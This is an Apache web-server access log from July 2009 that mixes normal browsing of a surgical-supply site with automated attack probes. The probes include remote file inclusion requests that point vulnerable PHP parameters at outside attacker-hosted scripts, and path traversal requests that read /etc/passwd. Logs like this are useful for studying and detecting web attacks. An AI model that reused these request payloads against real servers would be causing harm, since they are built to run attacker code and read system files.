174.133.150.130 - - [13/Jul/2009:01:58:32 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:58:32 -0400] "GET /errors.php?error=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:01:58:32 -0400] "GET /logs/errors.php?error=http://www.centralfilms.net/cgi/bots/response.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
222.236.47.188 - - [13/Jul/2009:01:58:42 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:01:58:42 -0400] "GET /logs/error_log.Q109041400%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:01:58:42 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 200 9330 "-" "Mozilla/5.0"
202.174.82.220 - - [13/Jul/2009:01:58:48 -0400] "GET /logs/access_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 308 "-" "libwww-perl/5.79"
201.232.54.48 - - [13/Jul/2009:01:58:51 -0400] "GET //index.php?abs_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
201.232.54.48 - - [13/Jul/2009:01:58:51 -0400] "GET /logs//index.php?abs_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.232.54.48 - - [13/Jul/2009:01:58:51 -0400] "GET /logs/error_log.Q109050600//index.php?abs_path=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
222.231.24.206 - - [13/Jul/2009:02:00:18 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
222.231.24.206 - - [13/Jul/2009:02:00:22 -0400] "GET //components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
222.231.24.206 - - [13/Jul/2009:02:00:28 -0400] "GET //components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
174.133.150.130 - - [13/Jul/2009:02:00:50 -0400] "GET /logs/access_log.Q109052400/rfihttp://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:02:00:50 -0400] "GET /rfihttp://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:02:00:50 -0400] "GET /logs/rfihttp://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 404 255 "-" "libwww-perl/5.820"
174.133.150.130 - - [13/Jul/2009:02:00:51 -0400] "GET /logs/access_log.Q109061300/rfihttp://www.centralfilms.net/cgi/bots/response.txt??? HTTP/1.1" 404 277 "-" "libwww-perl/5.820"
209.59.12.99 - - [13/Jul/2009:02:01:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.231.24.206 - - [13/Jul/2009:02:01:41 -0400] "GET /logs/access_log.Q109070800//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
213.222.13.89 - - [13/Jul/2009:02:01:42 -0400] "GET /logs/access_log.Q109063000//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/r0x-id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
222.231.24.206 - - [13/Jul/2009:02:01:42 -0400] "GET //components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
222.231.24.206 - - [13/Jul/2009:02:01:42 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
222.236.47.188 - - [13/Jul/2009:02:01:47 -0400] "GET /logs/error_log.Q109050800%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
202.174.82.220 - - [13/Jul/2009:02:01:56 -0400] "GET /logs/error_log.Q109061500/plugins/spamx/MassDelete.Admin.class.php/geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 307 "-" "libwww-perl/5.79"
222.231.24.206 - - [13/Jul/2009:02:02:06 -0400] "GET /logs/access_log.Q109070800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
222.231.24.206 - - [13/Jul/2009:02:02:07 -0400] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
222.231.24.206 - - [13/Jul/2009:02:02:07 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
85.10.140.174 - - [13/Jul/2009:02:03:40 -0400] "GET //com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/v2-id.txt?? HTTP/1.1" 404 236 "-" "Microsoft Pocket Internet Explorer/0.6"
85.10.140.174 - - [13/Jul/2009:02:03:40 -0400] "GET /logs//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/v2-id.txt?? HTTP/1.1" 404 241 "-" "Microsoft Pocket Internet Explorer/0.6"
66.249.68.70 - - [13/Jul/2009:02:03:57 -0400] "GET /images/items/3005117_thumb.jpg HTTP/1.1" 200 2833 "-" "Googlebot-Image/1.0"
222.231.24.206 - - [13/Jul/2009:02:04:00 -0400] "GET /logs/access_log.Q109070800//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
222.231.24.206 - - [13/Jul/2009:02:04:01 -0400] "GET //components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
222.231.24.206 - - [13/Jul/2009:02:04:02 -0400] "GET /logs//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
222.236.47.188 - - [13/Jul/2009:02:04:15 -0400] "GET /logs/error_log.Q109060600%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.231.24.206 - - [13/Jul/2009:02:04:24 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
222.231.24.206 - - [13/Jul/2009:02:04:32 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
209.59.12.99 - - [13/Jul/2009:02:06:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.163.139.56 - - [13/Jul/2009:02:06:10 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.163.139.56 - - [13/Jul/2009:02:06:10 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.163.139.56 - - [13/Jul/2009:02:06:10 -0400] "GET ///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
69.163.139.56 - - [13/Jul/2009:02:06:10 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
222.231.24.206 - - [13/Jul/2009:02:06:14 -0400] "GET /logs/access_log.Q109062200//components/com_fabrik/libs/Blowfish/ECB.php?mosConfig_absolute_path=http://83.3.132.70/iGeoMap/www//tmp/r.jpg?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
87.230.9.68 - - [13/Jul/2009:02:06:44 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
87.230.9.68 - - [13/Jul/2009:02:06:44 -0400] "GET ///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
87.230.9.68 - - [13/Jul/2009:02:06:44 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
87.230.9.68 - - [13/Jul/2009:02:06:44 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0"
222.236.47.188 - - [13/Jul/2009:02:06:58 -0400] "GET /logs/error_log.Q109050800///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
222.236.47.188 - - [13/Jul/2009:02:06:58 -0400] "GET /logs/error_log.Q109060600///?_SERVER[DOCUMENT_ROOT]=http://www.qting.co.kr/main/ucc/files/zfxid.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
69.59.21.101 - - [13/Jul/2009:02:07:25 -0400] "GET ///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 222 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
69.59.21.101 - - [13/Jul/2009:02:07:25 -0400] "GET /logs/access_log.Q109061700///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
69.59.21.101 - - [13/Jul/2009:02:07:25 -0400] "GET /logs///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
69.59.21.101 - - [13/Jul/2009:02:07:26 -0400] "GET /logs/access_log.Q109051000///vwar/backup/errors.php?error=http://www.krob.de/bilder/Bildb?? HTTP/1.1" 404 249 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
201.171.107.90 - - [13/Jul/2009:02:09:35 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:09:35 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:09:37 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:09:37 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/about.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.232.54.48 - - [13/Jul/2009:02:10:11 -0400] "GET /appserv/main.php?appserv_root=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
201.232.54.48 - - [13/Jul/2009:02:10:11 -0400] "GET /logs/access_log.Q109051400/appserv/main.php?appserv_root=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
201.232.54.48 - - [13/Jul/2009:02:10:11 -0400] "GET /logs/appserv/main.php?appserv_root=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
213.222.13.89 - - [13/Jul/2009:02:10:47 -0400] "GET /logs/access_log.Q109062200//com_moofaq/includes/file_includer.php?gzip=0&file=http://83.3.132.70/iGeoMap/www//tmp/r0x-id.txt? HTTP/1.1" 404 263 "-" "libwww-perl/5.79"
201.171.107.90 - - [13/Jul/2009:02:10:49 -0400] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):03 HTTP/1.1" 200 61587 "http://www.acesurgical.com/nonresorbable.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.232.54.48 - - [13/Jul/2009:02:10:50 -0400] "GET /logs/access_log.Q109051800/appserv/main.php?appserv_root=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
201.171.107.90 - - [13/Jul/2009:02:10:51 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:51 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:51 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:51 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:51 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:51 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:51 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:52 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:52 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:52 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:52 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:52 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:52 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:53 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:53 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:53 -0400] "GET /images/items/3232000_THUMB.JPG HTTP/1.1" 200 1058 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:53 -0400] "GET /images/items/3231000_THUMB.JPG HTTP/1.1" 200 3373 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:53 -0400] "GET /images/items/3233000_THUMB.JPG HTTP/1.1" 200 1941 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:53 -0400] "GET /images/items/3231001_THUMB.JPG HTTP/1.1" 200 939 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:53 -0400] "GET /images/items/3231002_THUMB.JPG HTTP/1.1" 200 2115 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:53 -0400] "GET /images/items/3231003_THUMB.JPG HTTP/1.1" 200 1116 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:54 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
201.171.107.90 - - [13/Jul/2009:02:10:54 -0400] "GET /images/next.gif HTTP/1.1" 200 249 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):03" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; WinuE v6; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0; WinuE v6)"
